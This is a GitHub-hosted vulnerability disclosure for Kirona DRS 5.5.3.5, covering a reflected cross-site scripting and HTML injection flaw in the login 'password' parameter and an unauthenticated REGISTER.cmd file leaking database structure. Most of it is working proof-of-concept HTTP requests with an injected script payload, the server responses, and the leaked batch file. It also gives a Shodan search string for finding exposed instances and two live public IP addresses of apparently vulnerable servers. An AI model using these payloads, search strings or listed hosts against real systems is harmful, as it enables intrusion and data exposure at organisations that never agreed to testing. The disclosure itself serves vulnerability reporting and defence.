Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Vulnerabilities/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
351 lines (260 sloc)
14.2 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Kirona-DRS version 5.5.3.5 Multiple Vulnerabilities. | |
| # Discovered Date: 03/10/2019 | |
| # Shodan Search: /opt-portal/pages/login.xhtml | |
| # Exploit Author: Ramikan | |
| # Vendor Homepage: https://www.kirona.com/products/dynamic-resource-scheduler/ | |
| # Affected Version: DRS 5.5.3.5 may be other versions. | |
| # Tested On Version: DRS 5.5.3.5 on PHP/5.6.14 | |
| # Vendor Fix: Unknown | |
| # CVE: CVE-2019-17503,CVE-2019-17504 | |
| # Category: Web Apps | |
| # Reference : https://github.com/Ramikan/Vulnerabilities/blob/master/Kirona-DRS 5.5.3.5 Multiple Vulnerabilities | |
| # Blog: www.fact-in-hack.blogspot.com | |
| *************************************************************************************************************************** | |
| Description: | |
| The application is vulnerable to the HTML injection, reflected cross site scripting and sensitive data disclosure. | |
| *************************************************************************************************************************** | |
| Vulnerabiity 1: HTML injection and Cross Site Scripting (CVE-2019-17504) | |
| *************************************************************************************************************************** | |
| An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. A reflected Cross-site scripting (XSS) vulnerability allows remote attackers to inject arbitrary web script via the /osm/report/ 'password' parameter. | |
| Affected URL: /osm/report/ | |
| Affected Parameter: password | |
| POST Request: | |
| POST /osm/report/ HTTP/1.1 | |
| Host: 10.50.3.148 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-GB,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 147 | |
| Connection: close | |
| Referer: https://10.50.3.148/osm/report/ | |
| Upgrade-Insecure-Requests: 1 | |
| create=true&password=&login=admin&password='<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!-- | |
| Response: | |
| HTTP/1.1 200 OK | |
| Date: Thu, 03 Oct 2019 14:56:05 GMT | |
| Server: Apache | |
| X-Powered-By: PHP/5.6.14 | |
| Access-Control-Allow-Origin: * | |
| Access-Control-Allow-Headers: X-Requested-With | |
| XDomainRequestAllowed: 1 | |
| Expires: Mon, 26 Jul 1997 05:00:00 GMT | |
| Last-Modified: Thu, 03 Oct 2019 14:56:05 GMT | |
| Cache-Control: no-cache, must-revalidate | |
| Pragma: no-cache | |
| Content-Length: 728 | |
| Connection: close | |
| Content-Type: text/html;charset=UTF-8 | |
| <html> | |
| <head> | |
| <img src='logo.jpg'> | |
| <form method='POST'> | |
| <input type='hidden' name='create' value='true'/> | |
| <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/> | |
| <table> | |
| <tr><td>Login:</td><td><input type='login' name='login'/></td></tr> | |
| <tr><td>Password:</td><td><input type='password' name='password'/></td></tr> | |
| <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr> | |
| </table> | |
| </form> | |
| </head> | |
| </html> | |
| GET Request: | |
| GET https://10.0.1.110/osm/report/?password=%27%3C%22%20%3E%3C%3Ch1%3EHTML%20Injection-heading%20tag%20used%3C/h1%3E%3Cscript%3Ealert(%22This%20is%20Cross%20Site%20Scripting%22)%3C/script%3E%3C!-- HTTP/1.1 | |
| Host: vs-kdrs-l-01.selwoodhousing.local | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-GB,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| Response: | |
| HTTP/1.1 200 OK | |
| Date: Thu, 03 Oct 2019 14:53:35 GMT | |
| Server: Apache | |
| X-Powered-By: PHP/5.6.14 | |
| Access-Control-Allow-Origin: * | |
| Access-Control-Allow-Headers: X-Requested-With | |
| XDomainRequestAllowed: 1 | |
| Expires: Mon, 26 Jul 1997 05:00:00 GMT | |
| Last-Modified: Thu, 03 Oct 2019 14:53:35 GMT | |
| Cache-Control: no-cache, must-revalidate | |
| Pragma: no-cache | |
| Content-Length: 728 | |
| Connection: close | |
| Content-Type: text/html;charset=UTF-8 | |
| <html> | |
| <head> | |
| <img src='logo.jpg'> | |
| <form method='POST'> | |
| <input type='hidden' name='create' value='true'/> | |
| <input type='hidden' name='password' value=''<" ><<h1>HTML Injection-heading tag used</h1><script>alert("This is Cross Site Scripting")</script><!--'/> | |
| <table> | |
| <tr><td>Login:</td><td><input type='login' name='login'/></td></tr> | |
| <tr><td>Password:</td><td><input type='password' name='password'/></td></tr> | |
| <tr><td colspan='2'><input type='submit' value='Login'/> </td></tr> | |
| </table> | |
| </form> | |
| </head> | |
| </html> | |
| *************************************************************************************************************************** | |
| Vulnerability 2: Source code and sensitive data disclosure. (CVE-2019-17503) | |
| *************************************************************************************************************************** | |
| An issue was discovered in Kirona Dynamic Resource Scheduling (DRS) 5.5.3.5. An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly: it contains sensitive information about the database through the SQL queries within this batch file. This file exposes SQL database information such as database version, table name, column name, etc. | |
| Affected URL: /osm/REGISTER.cmd or /osm_tiles/REGISTER.cmd | |
| Live example: | |
| https://79.174.169.85/osm/REGISTER.cmd | |
| http://82.196.226.108/osm_tiles/REGISTER.cmd | |
| Request: | |
| GET /osm/REGISTER.cmd HTTP/1.1 | |
| Host: 10.0.0.148 | |
| User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-GB,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| Response: | |
| HTTP/1.1 200 OK | |
| Date: Thu, 03 Oct 2019 09:23:54 GMT | |
| Server: Apache | |
| Last-Modified: Tue, 07 Nov 2017 09:27:52 GMT | |
| ETag: "1fc4-55d612f6cae13" | |
| Accept-Ranges: bytes | |
| Content-Length: 8132 | |
| Connection: close | |
| @echo off | |
| set DEBUGMAPSCRIPT=TRUE | |
| rem | |
| rem Find root path and batch name | |
| rem root path is found relative to the current batch name | |
| rem | |
| rem turn to short filename (remove white spaces) | |
| for %%i in (%0) do ( | |
| set SHORT_MAPSCRIPTBATCH_FILE=%%~fsi | |
| set MAPSCRIPTBATCH_FILE=%%~i | |
| ) | |
| for %%i in (%SHORT_MAPSCRIPTBATCH_FILE%) do ( | |
| set MAPSCRIPTROOTDIR=%%~di%%~pi..\..\.. | |
| ) | |
| if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTROOTDIR=%MAPSCRIPTROOTDIR% | |
| if "%DEBUGMAPSCRIPT%"=="TRUE" echo MAPSCRIPTBATCH_FILE=%MAPSCRIPTBATCH_FILE% | |
| rem | |
| rem find if we are in INTERRACTIVE mode or not and check the parameters | |
| rem | |
| if "%1"=="" goto INTERACTIVE | |
| goto NONINTERRACTIVE | |
| :NONINTERRACTIVE | |
| rem non interractive call so catch the parameters from command line | |
| rem this is supposed to be called from the root DRS directory | |
| if "%2"=="" ( | |
| echo Invalid parameter 2 | |
| pause | |
| goto :EOF | |
| ) | |
| set ACCOUNT=%2 | |
| set STATIC=NO | |
| if "%1"=="STATIC" set STATIC=YES | |
| if "%DEBUGMAPSCRIPT%"=="TRUE" echo Command line mode %STATIC% %ACCOUNT% | |
| if "%1"=="STATIC" goto GLOBAL | |
| if "%1"=="DYNAMIC" goto GLOBAL | |
| echo Invalid parameter 1 | |
| pause | |
| goto :EOF | |
| :INTERACTIVE | |
| rem Interractive mode : ask for account and static mode | |
| if "%DEBUGMAPSCRIPT%"=="TRUE" echo Interractive mode | |
| echo Open Street Map setup for Xmbrace DRS | |
| set /P ACCOUNT=Account name: | |
| set /P STATIC=Limited map feature (YES/NO): | |
| rem back to the setup directory | |
| cd %MAPSCRIPTROOTDIR% | |
| rem # READ AND DEFINE SETTINGS | |
| for /F "tokens=1,* delims==" %%k in (conf\default.txt) do ( | |
| if not "%%k"=="#=" set %%k=%%l | |
| ) | |
| if exist CUSTOM\CONF\custom.txt ( | |
| for /F "tokens=1,* delims==" %%k in (CUSTOM\CONF\custom.txt) do ( | |
| if not "%%k"=="#=" set %%k=%%l | |
| ) | |
| ) | |
| for /F "tokens=1,* delims==" %%k in (conf\settings.txt) do ( | |
| if not "%%k"=="#=" set %%k=%%l | |
| ) | |
| if "%APACHE_USE_SSL%"=="TRUE" ( | |
| set DEFAULT_HTTP_PROTOCOL=https | |
| set APACHE_USE_SSL_VALUE=true | |
| set DEFAULT_HTTP_PORT=%APACHE_HTTPS_PORT% | |
| ) else ( | |
| set DEFAULT_HTTP_PROTOCOL=http | |
| set APACHE_USE_SSL_VALUE=false | |
| set DEFAULT_HTTP_PORT=%APACHE_HTTP_PORT% | |
| ) | |
| goto GLOBAL | |
| rem | |
| rem good to go in a non interractive mode | |
| rem the following is the generic par of the install, whatever we are in static or dynamic mode | |
| rem | |
| :GLOBAL | |
| if "%DEBUGMAPSCRIPT%"=="TRUE" echo Global section | |
| set MYSQL="MYSQL\MySQL Server 5.6 MariaDB\bin\mysql.exe" | |
| echo delete from %ACCOUNT%.asp_custom_action where CA_CAPTION in ('Show on map','Closest')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo delete from %ACCOUNT%.asp_custom_tab where NAME='Map'> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| set INSERTFIELDS=%ACCOUNT%.asp_custom_action (CA_CAPTION,CA_VIEW,CA_MODE,CA_LIST_MODE,CA_HEIGHT,CA_WIDTH,CA_RESIZABLE,CA_NEED_REFRESH,CA_PROFILES,CA_URL,CA_CUSTOM_TAB,CA_TRIGGER_MODE) | |
| if "%STATIC%"=="YES" goto :STATIC | |
| goto :DYNAMIC | |
| :STATIC | |
| if "%DEBUGMAPSCRIPT%"=="TRUE" echo Static section | |
| echo map=static > ACCOUNTS\%ACCOUNT%\config.txt | |
| echo ^<?php $staticMap=true; ?^>>APACHE\htdocs\osm\mode.php | |
| echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Journey on map','workerView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| if exist req.sql del req.sql | |
| goto FINAL | |
| :DYNAMIC | |
| if "%DEBUGMAPSCRIPT%"=="TRUE" echo Dynamic section | |
| echo map=dynamic > ACCOUNTS\%ACCOUNT%\config.txt | |
| echo ^<?php $staticMap=false; ?^>>APACHE\htdocs\osm\mode.php | |
| echo insert into %INSERTFIELDS% values ('Show on map','jobList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Show on map','jobView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Closest','jobList','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Closest','jobView','modal','unique',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=closest','','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Show on map','workerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Show on map','workerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Journey on map','workerList','modal','mandatory',600,1024,true,false,'Administrator','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%^&mapType=journey','','button')> req.sql | |
| rem %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Show on map','customerList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Show on map','customerView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderList','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Show on map','serviceOrderView','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| echo insert into %INSERTFIELDS% values ('Show on map','planning','customTab','mandatory',600,1024,true,false,'Administrator','','Map','button')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| set INSERTFIELDS=%ACCOUNT%.asp_custom_tab (NAME,POSITION,ADMIN,URL,WIDTH,HEIGHT) | |
| echo insert into %INSERTFIELDS% values ('Map',0,'false','%DEFAULT_HTTP_PROTOCOL%://%OTRMS_HOST%:%DEFAULT_HTTP_PORT%/osm/map.php?account=%ACCOUNT%','100%%','100%%')> req.sql | |
| %MYSQL% mysql --port=%MYSQL_TCP_PORT% --verbose --user=%MYSQL_LOGIN% --password=%MYSQL_PASSWORD% < req.sql | |
| if exist req.sql del req.sql | |
| goto FINAL | |
| :FINAL | |
| echo Map registred for %ACCOUNT% | |
| if "%1"=="" pause | |
| goto :EOF | |
| *************************************************************************************************************************** | |
| Recommendation: | |
| *************************************************************************************************************************** | |
| Contact vendor for the fix. |